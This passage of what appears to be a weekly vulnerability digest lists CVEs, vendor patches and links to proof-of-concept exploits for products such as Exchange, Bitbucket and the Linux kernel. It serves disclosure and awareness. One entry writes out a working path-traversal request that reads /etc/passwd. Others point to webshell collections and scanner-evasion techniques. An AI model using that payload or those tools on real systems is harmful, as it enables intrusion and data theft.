vulnerability requires R&D leaders, AppSec engineers, and security professionals to ensure they immediately patch the vm2 sandbox if they use it in their applications. A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.  
\n\n   - [Analysis : CVE-2022-42889 / Text4Shell](https://cyberwatch-fr.translate.goog/cve/cve-2022-42889-text4shell-comment-detecter-et-corriger-cette-vulnerabilite-sur-apache-commons-text/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB)\n       - Target/Product: **Apache Commons Text** is a software component used to manipulate character strings, published by the Apache Foundation.\n       - Description/Issue/Flaw : CVE-2022-42889 Text4Shell is a remote code execution vulnerability in Apache Commons Text software. On October 13, 2022, the Apache Foundation published a vulnerability in the code of the Apache Commons Text project and posted a message to this effect in the project's mailing list. This vulnerability closely resembles the Log4Shell CVE series, and is referenced as CVE-2022-42889. Apache Commons Text is used to check if one string contains another, or to construct messages from a preconfigured format.\n\n   - [Analysis : Windows CLFS Zero-Day Vulnerability CVE-2022-37969 Part 1: Root Cause Analysis](https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part) ([MSRC advisory](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37969))\n       - Target/Product: **Microsoft** \n       - Description/Issue/Flaw : An attacker who successfully exploits this vulnerability may gain SYSTEM privileges. The 0-day exploit can execute the privilege escalation successfully on Windows 10 and Windows 11 prior to the September patch. The cause of the vulnerability is the lack of a strict bounds check on the field cbSymbolZone in the Base Record Header for the base log file (BLF) in CLFS.sys. If the field cbSymbolZone is set to an invalid offset, an out-of-bounds write will occur at the invalid offset. 
In this two-part blog series, we will demystify the vulnerability and the 0-day exploit discovered in-the-wild. The blogs consist of two parts: an analysis of the root cause, and an analysis of the exploit. In this blog, we first present a detailed analysis of the root cause for CVE-2022-37969.\n\n   - [Detailed Report of Top CVEs most used by Chinese state-sponsored cyber actors since 2020](https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF)\n\n      - Summary : [Top CVEs most used by Chinese state-sponsored cyber actors since 2020](https://www.cisa.gov/uscert/ncas/alerts/aa22-279a)\n      - Affected Vendors : \n <img src=\"https://user-images.githubusercontent.com/25515871/195232896-65a359b5-91b4-4dbf-ae64-05b4e8ff3a82.jpg\" width=\"500\" height=\"450\"> \n \n - Description : US authorities (NSA, FBI, CISA) expose the top 20 vulnerabilities actively exploited by Chinese state-sponsored attackers, and NSA, CISA, and FBI urge organizations to apply the recommendations below:\n\n    - Update and patch systems as soon as possible. Prioritize patching vulnerabilities identified in this CSA and other known exploited vulnerabilities.\n    - Utilize phishing-resistant multi-factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised. \n    - Block obsolete or unused protocols at the network edge. \n    - Upgrade or replace end-of-life devices.\n    - Move toward the Zero Trust security model. \n    - Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity.\n \n</details>\n\n<details>\n <summary> PoC for CVE & Exploit (Total : 5+ new 0-days that matter this week and 4 important from CVEs last week) :\n  \n > Every week we're tracking the recently discovered Exploits and PoCs for CVEs.  
\n</summary>\n \n   - [PoC CVE-2021-46422](https://github.com/Awei507/CVE-2021-46422)\n       \n       - Target/Product: **Google Chrome**\n       - Affected Version: PoC author claims \"All\" but the CVE says version < 80.0.3987.149\n       - Solution : google-chrome-upgrade-latest\n       - Description : Use after free in WebGL in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n   - [PoC CVE-2022-41852 (unofficial)](https://github.com/Warxim/CVE-2022-41852)\n        \n       - Target/Product: **Apache**\n       - Description : Remote Code Execution in JXPath Library. (For example, methods JXPathContext.getValue(path) and JXPathContext.iterate(path) are dangerous if you let a user send input into the path parameter.) CVE-2022-41852 allows attackers to execute code on the application server. You can read more about this [vulnerability here](https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/).\n\n \n- Important **PoC from Last Week** :\n \n   - [CVE-2022-41208-PoC](https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse)\n        \n       - Target/Product: **Microsoft Exchange Server**\n       - Affected Version: <8.3.1 \n       - Description : ProxyNotShell – CVE-2022-40140 & CVE-2022-41082. Metasploit Framework implementation of zero-day bug in Microsoft Exchange Server which leads to RCE.\n \n   - [CVE-2022-41040](https://github.com/kljunowsky/CVE-2022-41040-POC)  \n       - Target/Product: **Microsoft Exchange Server**\n       - Description : PoC for Microsoft CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server.   
\n                     - [Zeroday Microsoft Exchange Server checker (Virtual Patching checker)](https://github.com/VNCERT-CC/0dayex-checker)\n \n   - [PS5-4.03-Kernel-Exploit](https://github.com/Cryptogenic/PS5-4.03-Kernel-Exploit)\n       - Target/Product: **PS5**\n       - Exploit supported firmwares : 4.03, 4.50, 4.51\n       - Description/Issue/Flaw : 🔥PS5 kernel exploit based on TheFlow's IPV6 Use-After-Free (UAF), which was reported on HackerOne. The exploit strategy is for the most part based on TheFlow's BSD/PS4 PoC with some changes to accommodate the annoying PS5 memory layout (for more see the Research Notes section). It establishes an arbitrary read / (semi-arbitrary) write primitive. This exploit and its capabilities have a lot of limitations, and as such, it's mostly intended for developers to play with to reverse engineer some parts of the system.\n\n   - [DropBox-XPC-Exploit](https://github.com/Pwnrin/DropBox-XPC-Exploit)\n        - Target/Product: **Dropbox**\n        - Description/Issue/Flaw : 🔥DropBox-XPC-Exploit (https://github.com/Pwnrin/DropBox-XPC-Exploit) is an exploit for PID Reuse and Logical Error in DropBox's XPC service.\n         \n</details>\n\n---\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 27th Sept-11th October 2022\n\n\n\n \n    Security Patched within a Week: # Latest vulnerability that has been patched within the last two weeks (12th Oct - 18th October 2022).                                      
\n                                    featuring releases from Microsoft, Adobe, Github, Cisco, Linux(Ubuntu, kali etc), Firefox etc.\n\n    CVE:ANALYSIS & POC:             CVE-2022-34960, CVE-2022-41218, HackerOne report #1672388 - Gitlab, CVE-2022-33987,\n                                    CVE-2022-36635 and Detailed Report of Top CVEs most used by Chinese state-sponsored cyber actors since 2020 \n\n         \n    CVE POC (0-Day):                Zeroday Microsoft Exchange Server checker (Virtual Patching checker), DropBox-XPC-Exploit,\n                                    CVE Collection of jQuery UI XSS Payloads, nuclei-template for CVE-2022-35405, An updated list of PoC's CVEs, \n \n                                    PS5-4.03-Kernel-Exploit, CVE-2022-41040, CVE-2022-26726, CVE-2022-30600, CVE-2022-39197, CVE-2021-29156 Exploit,\n                                    CVE-2022-30206, CVE-2022-2992, CVE-2022-41208, CVE-2022-2274 and CVE-2022-36804\n\n---\n\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 21st Sept-27th Sept 2022\n\n \n        Security Patched within a Week: Latest vulnerability that has been patched within a week (21st Sep-27th Sep 2022).                                      
\n                                        featuring releases from Apple, Google, Microsoft, Github, Linux(Ubuntu, kali etc), WordPress etc.\n        \n        CVE:ANALYSIS & POC:             CVE-2022-39197, CVE-2022-36934, CVE-2022-27492, CVE-2022-40286, CVE-2021-41653, CVE-2022-39205,\n                                        CVE-2022-39206, CVE-2022-39207 & CVE-2022-39208.\n         \n        CVE POC (0-Day):                CVE-2022-39197, CVE-2022-36804, CVE-2022-30206, CVE-2022-28282, CVE-2022-34729, Cronos poc, \n                                        CVE-2022-23743, Webshell - Open source project, Windows10 - Custom Kernel Signers.\n  \t\n<details>\n<summary>\nSecurity Patched within a Week: \n</summary>\n\n- Here’s a look at the latest security issues (Severity : Critical or High) that have been patched in a week (21st Sep-27th Sep 2022), and we highly recommend upgrading or updating from the original source. \n \n- **WhatsApp** Security Advisories September Update : CVE-2022-36934 (prior to v2.22.16.12) and CVE-2022-27492 (prior to v2.22.16.2).\n- **Node.js** Update Fixes High Severity Flaws : CVE-2022-32212, CVE-2022-32215 & CVE-2022-35256. 
(Affected v18.x, v16.x, and v14.x)\n- Several security issues were fixed in the different versions of **Ubuntu** Linux kernel packages.\n  - **Ubuntu 22.04** : bind9, mako, tiff, linux-gkeop, python-oauthlib, linux-oem-5.17, linux-gcp, linux-gke, linux-raspi - Li, etc.\n  - **Ubuntu 20.04 LTS** & **Ubuntu 18.04 LTS** : bind9, mako, tiff, libjpeg-turbo, vim, xen, etcd, linux-hwe-5.15/5.4, linux-lowlatency-hwe-5.15/5.4, linux, linux-aws, linux-aws-5.15/5.4, linux-azure, linux-azure-5.15/5.4, linux-kvm, linux-bluefield, linux-gkeop, linux-ibm, linux-ibm-5.4, linux-oracle, linux-oracle-5.4.\n\n- **Microsoft** [Endpoint Configuration Manager Spoofing Vulnerability](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-37972)\n- **Cisco** [NX-OS Software Border Gateway Protocol Denial of Service Vulnerability](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180620-nxosbgp?vs_f=Cisco%20Security%20Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_p=Cisco%20NX-OS%20Software%20Border%20Gateway%20Protocol%20Denial%20of%20Service%20Vulnerability&vs_k=1)\n- **Mozilla** Releases Security Updates for [Firefox 105](https://www.mozilla.org/en-US/security/advisories/mfsa2022-40/), [Firefox ESR 102.3](https://www.mozilla.org/en-US/security/advisories/mfsa2022-41/), [Thunderbird 102.3](https://www.mozilla.org/en-US/security/advisories/mfsa2022-42/) & [Thunderbird 91.13.1](https://www.mozilla.org/en-US/security/advisories/mfsa2022-39/).\n- **Jenkins** [Security Advisory 2022-09-21](https://www.jenkins.io/security/advisory/2022-09-21/).\n- **Zoho** [ManageEngine Multiple Products Remote Code Execution Vulnerability CVE-2022-35405 (CVSS score 9.8)](https://socprime.com/blog/cve-2022-35405-detection-cisa-warns-of-adversaries-leveraging-manageengine-rce-flaw/)\n- **Sophos** [Firewall Code Injection Vulnerability CVE-2022-3236](https://www.helpnetsecurity.com/2022/09/26/cve-2022-3236/)\n- **IBM** [Maximo Asset Management 7.6.1.1, 7.6.1.2, 
and 7.6.1.3 (CVE-2022-40616)](https://nvd.nist.gov/vuln/detail/CVE-2022-40616) \n- **Adobe** [Bridge version 12.0.2 (and earlier) and 11.1.3 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability](https://helpx.adobe.com/security/products/bridge/apsb22-49.html)\n\n</details>\n\n<details>\n<summary>\nCVE Analysis & PoC (9):\n</summary>\n\n   - [Analysis: CVE-2022-39197](https://securityonline.info/cve-2022-39197-critical-cobalt-strike-bug-could-lead-to-rce-attacks/)\n        \n        - Title -> Critical Cobalt Strike bug could lead to RCE attacks.\n        - [PoC CVE-2022-39197](https://github.com/burpheart/cve-2022-39197)\n        - Affected Version : prior to 4.7.1.\n        - Description/Issue/Flaw : The CVE-2022-39197 vulnerability exists in Cobalt Strike’s Beacon payload, which may allow an attacker to trigger XSS by setting a fake username in the Beacon configuration, thereby causing remote code execution on the CS Server.\n \n   - [Analysis: CVE-2022-36934 and CVE-2022-27492](https://nakedsecurity.sophos.com/2022/09/27/whatsapp-zero-day-exploit-news-scare-what-you-need-to-know/)\n        - Title -> WhatsApp “zero-day exploit” news scare – what you need to know\n        - Affected Version : Android prior to v2.22.16.12, Business for Android < v2.22.16.12, iOS < v2.22.16.12, Business for iOS < v2.22.16.12\n        - Description/Issue/Flaw : CVE-2022-36934 (An integer overflow in version v2.22.16.12 could result in remote code execution in an established video call.) & CVE-2022-27492 (An integer underflow in v2.22.16.2 could have caused remote code execution when receiving a crafted video file.)
\n\n   - [Analysis: CVE-2022-39205, CVE-2022-39206, CVE-2022-39207 & CVE-2022-39208](https://blog.sonarsource.com/onedev-remote-code-execution/)\n        - Title -> Securing Developer Tools: **OneDev** Remote Code Execution.\n        - Affected Version : 7.2.9.\n        - Description/Issue/Flaw : The OneDev tool has various features such as code search, CI/CD and static code analysis; it is an alternative to GitHub, GitLab and Bitbucket and it is open text. In this article Paul Gerste discusses the mentioned CVE IDs.\n\n   - [Analysis: CVE-2022-40286](https://www.x86matthew.com/view_post?id=windows_seagate_lpe)\n        - Title -> Exploiting a Seagate service to create a SYSTEM shell.\n        - Target & Affected Version : Seagate Media Sync.\n \n   - [Analysis : cve-2021-41653](https://k4m1ll0.com/cve-2021-41653.html)\n       - [cve-2021-41653 video PoC](https://www.youtube.com/watch?v=GBuuGdeTKgw&feature=youtu.be)\n       - Target/Product: **TP-Link**\n       - Title : TP-Link TL-WR840N EU v5 Remote Code Execution.\n       - Description/Issue : The goal was to achieve remote code execution on a TP-LINK TL-WR840N EU (V5) router. According to its papers, this version came out in 2017, and in case you're still using the old version then we highly recommend upgrading the firmware to the latest version \"TL-WR840N(EU)_V5_211109\". It can be downloaded from the vendor homepage. 
\n\n</details>\n\n<details>\n <summary>CVE PoC, shell & Exploit (9) :\n</summary>\n \n \n   - [CVE-2022-39197 PoC](https://github.com/Wh04m1001/ZoneAlarmEoP)\n        - Target/Product: **Cobalt Strike**\n        - Description/Issue/Flaw : CVE-2022-39197 Cobalt Strike XSS vulnerability patch. Disable HTML support for Swing by hooking the isHTMLString method of javax.swing.plaf.basic.\n \n   - [CVE-2022-36804-PoC](https://github.com/notxesh/CVE-2022-36804-PoC) \n        - Target/Product: **Atlassian Bitbucket**\n        - Affected Version: <8.3.1 \n        - Description : The script will automatically detect public repositories located on Bitbucket instances, then select a random repository to check or perform the vulnerability on. If there are no public repositories, a valid 'BITBUCKETSESSIONID' cookie is required in order to exploit known vulnerable instances. The PoC was designed to take multiple input hosts and pipe vulnerable hosts to stdout, allowing for piping of results in order to be processed by other tools.\n    \n   - [CVE-2022-30206](https://github.com/Pwnrin/CVE-2022-30206)\n        - Target/Product: **Microsoft**\n        - Description : PoC for Microsoft CVE-2022-30206: Windows Print Spooler Elevation of Privilege Vulnerability.\n  \n   - [CVE-2022-28282](https://github.com/Pwnrin/CVE-2022-28282)\n        - Target/Product: **Firefox**\n        - Description/Issue/Flaw : PoC for CVE-2022-28282 Firefox: heap-use-after-free in DocumentL10n::TranslateDocument.\n\n   - [CVE-2022-34729](https://github.com/Pwnrin/CVE-2022-34729)\n        - Target/Product: **NorthSea**\n        - Description/Issue/Flaw : NorthSea decided to delay the disclosure of this PoC for some reason.\n\n   - [Cronos poc](https://github.com/Idov31/Cronos)\n        - Description : PoC for a new sleep obfuscation technique (based on [Ekko](https://github.com/Cracked5pider/Ekko)) leveraging waitable timers to RC4 encrypt the current process and change the 
permissions from RW to RX to evade memory scanners.\n    \n \n   - [CVE-2022-23743 PoC](https://github.com/Wh04m1001/ZoneAlarmEoP)\n        - Target/Product: **Check Point's ZoneAlarm antivirus**\n        - Affected Version: < 15.8.211.19229\n        - Description/Issue/Flaw : Exploit for Arbitrary File Move vulnerability in ZoneAlarm AV.\n\n   - [Webshell - Open source project](https://github.com/tennc/webshell) \n      - Description : Scripts that enable threat actors to compromise web servers and launch additional attacks. This project covers a variety of commonly used scripts such as: asp, aspx, php, jsp, pl, py. NOTE : This project is only for testing, and all the consequences have nothing to do with the authors.\n\n   - [Windows10 - Custom Kernel Signers](https://github.com/HyperSine/Windows10-CustomKernelSigners) \n     - Description : Load self-signed drivers without TestSigning or disabling DSE.\n         \n</details>\n\n---\n\n## CVE's that matter [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 14th September - 20th September 2022\n\n \n        Security Patched :   Latest IT security vulnerabilities patched within this week in selected companies such as WhatsApp, Apple, Google,\n                             Microsoft, Github, Linux(Ubuntu, kali etc), WordPress etc. \n        \n        CVE:ANALYSIS & POC:  CVE-2022-32883 Analysis: Turning Your Computer Into a GPS Tracker With Apple Maps.\n                          \n         \n        CVE POC :            CVE-2022-32548 RCE, CVE-2022-2588, CVE-2022-34721, CVE-2022-36804, CVE-2022-34709, \n                             CVE-2022-33980, CVE-2019-2215 & GwisinMsi poc based on the Recreating an MSI Payload for Fun and no profit blog.  
\n\n<details>\n\n#### Security patched within a Week (Trial)\n \n   - Apple iOS, iPadOS, and macOS Remote Code Execution Vulnerability CVE-2022-32917\n   - Code Aurora ACDB Audio Driver Stack-based Buffer Overflow Vulnerability CVE-2013-2597\n   - Linux Kernel \n     - Improper Input Validation Vulnerability CVE-2013-6282\n     - Integer Overflow Vulnerability CVE-2013-2596\n     - Privilege Escalation Vulnerability CVE-2013-2094\n   - Github packages :\n     - Multiple *TensorFlow (< 2.10.0) packages* (tensorflow, tensorflow-cpu, tensorflow-gpu) are vulnerable to \n       CHECK fail & segfault that can be used to trigger a denial of service attack.\n     - oauthlib/oauthlib package (>=3.1.1) vulnerable to DoS when an attacker provides a malicious IPv6 URI.\n     - In the reactphp/http package (>= 0.7.0, < 1.7.0), when ReactPHP is processing incoming HTTP cookie values, the cookie names are url-decoded. This may lead to cookies with prefixes like __Host- and __Secure- being confused with cookies that decode to such a prefix, thus leading to an attacker being able to forge a cookie which is supposed to be secure. 
It has been fixed in reactphp/http v1.7.0.\n \n   - Microsoft Windows Common Log File System (CLFS) Driver Privilege Escalation Vulnerability CVE-2022-37969\n   - Microsoft Windows Remote Code Execution Vulnerability CVE-2010-2568\n   - Trend Micro Apex One and Apex One as a Service Improper Validation Vulnerability CVE-2022-40139\n \n #### CVE Analysis & PoC\n\n   - [CVE-2022-32883 Analysis: Turning Your Computer Into a GPS Tracker With Apple Maps](https://breakpoint.sh/posts/turning-your-computer-into-a-gps-tracker-with-apple-maps)\n   - [CVE-2022-32883 PoC](https://github.com/breakpointHQ/CVE-2022-32883)\n       - Target/Product: **Apple Maps**\n       - Patched : Update your devices running iOS and iPadOS to iOS 15.7/16 and iPadOS 15.7, and macOS Monterey to 12.6.\n       - Description/Issue : Ron Masses found and disclosed 2 vulnerabilities in Apple Maps that allowed him to extract the accurate location of the user without authorization.\n\n   - [GwisinMsi poc](https://github.com/ChoiSG/GwisinMsi)\n       - Title: PoC MSI payload based on ASEC/AhnLab's blog - [Recreating an MSI Payload for Fun and no profit](https://blog.sunggwanchoi.com/recreating-a-msi-payload-for-fun-and-no-profit/)\n       - Target/Product: **MSI**\n       - Description/Issue : The payload is based on the [Gwisin ransomware's MSI payload analysis of the AhnLab ASEC team's blog post](https://asec.ahnlab.com/en/37483/).\n\n   - [CVE-2022-2588 PoC](https://github.com/sang-chu/CVE-2022-2588)\n      - Target/Product: **Linux kernel**\n      - Description/Issue: Linux kernel cls_route UAF\n\n   - [CVE-2022-34721 PoC](https://github.com/78ResearchLab/PoC/tree/main/CVE-2022-34721)\n       - Title: Windows Internet Key Exchange (IKE) Protocol Extension Remote Code Execution.\n       - Target/Product: **Windows Internet Key Exchange 
(IKE)**\n       - Description/Issue: The 3 vulnerabilities related to the IKE Extension were patched on Patch Tuesday in September 2022. One of the vulnerabilities was found during IKE related research, which was patched by Yuki Chen.\n \n   - [CVE-2022-36804 PoC](https://github.com/CEOrbey/CVE-2022-36804-MASS-RCE)\n       - Target/Product: **Atlassian Bitbucket Server and Data Center**\n       - Affected Version: All versions of Bitbucket Server and Data Center released before versions 7.6.17, 7.17.10, 7.21.4, 8.0.3, 8.1.2, 8.2.2, and 8.3.1 are vulnerable.\n       - Description/Issue : A critical vulnerability (CVE-2022-36804) in Atlassian Bitbucket Server and Data Center could be exploited by unauthorized attackers to execute malicious code on vulnerable instances.\n\n   - [CVE-2022-34709 PoC](https://bugs.chromium.org/p/project-zero/issues/detail?id=2301)\n       - Title: **Windows: Credential Guard ASN1 Decoder Type Confusion EoP**\n       - Description/Issue : A number of Kerberos CG APIs do not verify the ASN1 PDU type when decoding and encoding Kerberos ASN1 structures, leading to type confusion and elevation of privilege. 
Windows patched this CVE-2022-34709 - [Windows Defender Credential Guard Security Feature Bypass Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34709) with a new version.\n\n   - [CVE-2022-33980 PoC](https://github.com/HKirito/CVE-2022-33980)\n       - Target/Product: **Apache**\n       - Affected Version: 2.4 through 2.7\n       - Description/Issue: Apache Commons RCE can use the url, dns and script keywords to connect to any server\n\n   - [CVE-2019-2215 PoC](https://github.com/ameetsaahu/Kernel-exploitation/tree/main/CVE-2019-2215)\n       - Target/Product: **Linux kernel**\n       - Affected Version: >= 4.14\n       - Description/Issue: Exploit for bad binder CVE-2019-2215 on x86_64 Android.\n \n</details>\n      \n---\n\n<details>\n<summary><b> \n\nCVE's that matter [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 7th Sept - 13th Sept 2022\n\n        CVE POC :      CVE-2022-22629 MacOS, CVE-2022-37706, CVE-2022-40297, CVE-2022-34169, CVE-2022-20128, CVE-2022-20360, CVE-2022-27925, \n                       CVE-2022-37299, CVE-2022-25260, Chaining CVE-2021-42278 and CVE-2021-42287. \n        \n        CVE Analysis : Latest IT security vulnerabilities patched in selected companies such as Apple, Google, Microsoft, Github, \n                       Linux(Ubuntu, kali etc) & D-Link & CVE-2022-34169, CVE-2022-31474 WordPress.\n                          \n        Exploit :      Mobile Mouse 3.6.0.4 Remote Code Execution. \n\n</b></summary> \n \n### CVE PoC :\n  - [CVE-2022-22629 MacOS PoC](https://github.com/parsdefense/CVE-2022-22629)\n           \n      - Target & Affected Version: **MacOS - Safari <15.4**\n      - Description/Issue : This PoC is for the WebGL (a JavaScript API that is used in browsers to render 2D and 3D graphics) 
bug that was patched in the Safari 15.4 security updates.\n  \n  - [CVE-2022-37706 PoC](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit)\n           \n      - Target & Affected Version: **Ubuntu 22.04 & Distro**\n      - Description/Issue : A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04) \n    \n  - [CVE-2022-40297 PoC](https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc)\n    \n    - Target & Version : **Ubuntu Touch 16.04**\n    - Title : Privilege escalation in Ubuntu Touch 16.04 - by PIN Bruteforce\n    - Description : Ubuntu Touch allows you to \"protect\" devices with a 4-digit passcode. Such a code was set in a demonstration device. The problem is that the same 4-digit passcode then becomes a password that we can use with the sudo command and gain root privileges. This means that a malicious application can do us double harm:\n        1. Easily escalate privileges and take control of the device.\n        2. It can pass the screen unlock passcode to a third party.\n\n  - [CVE-2022-20128 PoC](https://github.com/irsl/CVE-2022-20128)\n    \n    - Target : **Android Debug Bridge (adb) - directory traversal**\n    - Description : Android Debug Bridge (adb) was vulnerable to directory traversal attacks that could have been mounted by rogue/compromised adb daemons during an adb pull operation.\n\n  - [CVE-2022-20360 PoC](https://github.com/nidhi7598/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360)\n     - Target : **Android setChecked LPE**\n\n  - [CVE-2022-27925 PoC](https://github.com/mohamedbenchikh/CVE-2022-27925)\n    \n    - Target & Patched Version : **Zimbra released a patch in 8.8.15P31 and 9.0.0P24.**\n    - Title : Zimbra Unauthenticated Remote Code Execution Exploit.\n    - Description : CVE-2022-27925 was originally listed as an RCE exploit requiring authentication. 
When combined with a separate bug, however, it became an unauthenticated RCE exploit that made remote exploitation trivial.\n \n  - [CVE-2022-37299 PoC](https://vulners.com/cve/CVE-2022-37299)\n  \n    - Target & Version: **Shirne CMS 1.2.0. Path Traversal**\n    - PoC: GET /static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test\n \n  - [Chaining CVE-2021-42278 and CVE-2021-42287 PoC](https://github.com/Ridter/noPac)\n    - Description/Issue : Exploiting [CVE-2021-42278 and CVE-2021-42287](https://4sysops.com/archives/exploiting-the-cve-2021-42278-samaccountname-spoofing-and-cve-2021-42287-deceiving-the-kdc-active-directory-vulnerabilities/) to impersonate DA from a standard domain user. \n\n  - [CVE-2022-25260](https://github.com/yuriisanin/CVE-2022-25260)\n  \n    - Target & Patched Version : **JetBrains Hub <2021.1.14276**\n    - Title : JetBrains Hub pre-auth semi-blind server-side request forgery (SSRF).\n    \n    - Description : JetBrains Hub before 2021.1.14276 was vulnerable to improper access control (CVE-2022-34894), which allows an attacker to create untrusted services without authentication even if the guest user is disabled. This makes it possible to exploit the vulnerability without any other requirements (normally an attacker should be at least authenticated). The vulnerability was possible due to use of Apache Batik with default settings for user-supplied SVG icon rasterization.\n \n### CVE Analysis : \n- This is a trial segment where we're experimenting with the idea of tracking and filtering out IT professionals' essential software, and we're planning to provide CVE updates for selected companies such as Apple, Google, Microsoft, Github, Android, Linux(Ubuntu, kali etc), D-Link and CVEs listed on the National Cyber Awareness System. 
Let me know if you have suggestions or want to add your favorite company to this list.\n\n     - Vulnerability in NVIDIA Data Plane Development Kit Affecting Cisco Products (Cisco Catalyst 8000V Edge Software, Adaptive Security Virtual Appliance (ASAv) & Secure Firewall Threat Defense Virtual (formerly FTDv))\n     - Apple iOS, iPadOS, and macOS Input Validation Vulnerability CVE-2020-9934\n     - Oracle WebLogic Server Unspecified Vulnerability CVE-2018-2628\n     - Cisco Webex Meetings App (affected version <=42.7) Character Interface Manipulation Vulnerability. \n     - Google Chromium Insufficient Data Validation Vulnerability CVE-2022-3075\n     - Android OS Privilege Escalation Vulnerability CVE-2011-1823\n     - [Ubuntu Security Patches.](https://ubuntu.com/security/notices) \n              - Ubuntu 20.04 LTS : Linux kernel (Azure CVM) vulnerabilities.\n              - Ubuntu 16.04 ESM & Ubuntu 14.04 ESM : Dnsmasq vulnerability, LibTIFF vulnerabilities, Linux kernel (HWE) vulnerabilities, linux-oracle - Linux kernel for Oracle Cloud systems.\n     - D-Link DIR-816L RCE Vulnerability CVE-2022-28958\n     - D-Link DIR-820L RCE Vulnerability CVE-2022-26258\n     - D-Link Multiple Routers OS Command Injection Vulnerability CVE-2018-6530\n     - D-Link DIR-300 Router Cleartext Storage of a Password Vulnerability CVE-2011-4723\n     - NETGEAR Multiple Devices Exposure of Sensitive Information Vulnerability CVE-2017-5521\n---\n  \n  - [CVE-2022-34169 Analysis](https://noahblog-360-cn.translate.goog/xalan-j-integer-truncation-reproduce-cve-2022-34169/?_x_tr_sch=http&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp) & construction of the [full exploit](https://gist-github-com.translate.goog/thanatoskira/07dd6124f7d8197b48bc9e2ce900937f?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp)\n  \n     - Target: **Apache Xalan-J - A Java implementation of an XSLT processor.**\n     \n     - Description/Issue : In short, a vulnerability in Xalan-J, an Apache 
project used by multiple SAML implementations, could allow arbitrary code execution. Felix Wilhelm (Security Researcher at Google Project Zero) said that Xalan-J is vulnerable to an integer truncation issue when processing malicious XSLT stylesheets (XSLT is a markup language that can transform XML documents into other formats, such as HTML).\n\n - [CVE-2022-31474 Wordpress](https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/)\n           \n      - Target: **WordPress plugin - BackupBuddy**\n      - Affected Version : 8.5.8.0 and 8.7.4.1.\n      - Fully Patched Version: 8.7.5\n      \n      - Description/Issue : The BackupBuddy plugin, with 140,000 active installations, is meant to help WordPress site administrators easily manage their backup operations and allows users to store backups to various online and local destinations. The CVE assigned to this vulnerability is CVE-2022-31474, with a CVSS score of 7.5. The exploited vulnerability exists because of an insecure method of downloading backups for local storage, which enables unauthenticated attackers to download sensitive files from vulnerable sites.\n\n - [CVE-2022-31188](https://github.com/emirpolatt/CVE-2022-31188)\n\n ---\n ### EXPLOIT : \n - [Mobile Mouse 3.6.0.4 Remote Code Execution](https://github.com/blue0x1/mobilemouse/blob/main/mobilemouse.py) \n      - Exploit Author: Chokri Hammedi\n      - Vendor Homepage: https://mobilemouse.com/\n      - Software Link: https://www.mobilemouse.com/downloads/setup.exe\n      - Version: 3.6.0.4\n      - Tested on: Windows 10 Enterprise LTSC Build 17763\n      - Description: Mobile Mouse 3.6.0.4 could allow a remote attacker to execute arbitrary code on the system, caused by improper input validation. By sending a specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. 
\n\n</details>\n---\n<details>\n<summary><b> \n \nCVE's that matter [#Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 30th August - 07th September 2022 \n\n        CVE POC exploit : CVE-2022-1388, CVE-2022-32250 and CVE-2022-2639.\n      \n        CVE Analysis :    CVE-2022-30592, CVE-2021-38297, CVE-2022-31814, CVE-2022-21371, CVE-2022-24637, CVE-2022-33174, CVE-2022-1802,\n                          CVE-2022-23779, CVE-2022-24637, CVE-2022-35406 and Week#35 of Advisory Week Newsletter.\n \n </b></summary>\n\n\n - [CVE-2022-30592](https://github.com/efchatz/HTTP3-attacks)\n           \n      - Target: **QUIC-enabled servers (IIS, NGINX, LiteSpeed, Cloudflare, H2O, and Caddy)**\n      - Description/Issue : HTTP3-attacks : The repository serves the purpose of sharing the scripts the authors used, for educational usage. These attacks were a part of their study and were tested against 6 different QUIC-enabled servers that were configured to communicate with HTTP/3. The http-stream script is the exploit for the CVE-2022-30592 issue that affected the lsquic library. 
